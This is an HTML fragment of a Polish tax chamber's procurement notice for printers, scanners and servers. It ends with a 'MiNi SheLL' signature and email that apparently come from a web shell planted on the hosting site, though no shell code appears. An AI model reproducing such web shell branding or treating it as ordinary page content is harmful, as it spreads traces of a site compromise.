<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin dostawy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa drukarek, urządzeń wielofunkcyjnych i skanerów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego - Izby Skarbowej w Krakowie, ul. Wiślna 7, 31-007 Kraków, fabrycznie nowych i nieużywanych 1) drukarek w ilości 10 sztuk, 2) urządzeń wielofunkcyjnych A4 w ilości 30 szt., 3) skanerów dokumentów w ilości 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.21.61.10-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin dostawy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa serwerów i skanera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego - Izby Skarbowej w Krakowie, ul. Wiślna 7, 31-007 Kraków, fabrycznie nowych i nieużywanych 1) serwerów w ilości 2 szt., 2) skanera w ilości 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2, 30.21.61.10-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin dostawy - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com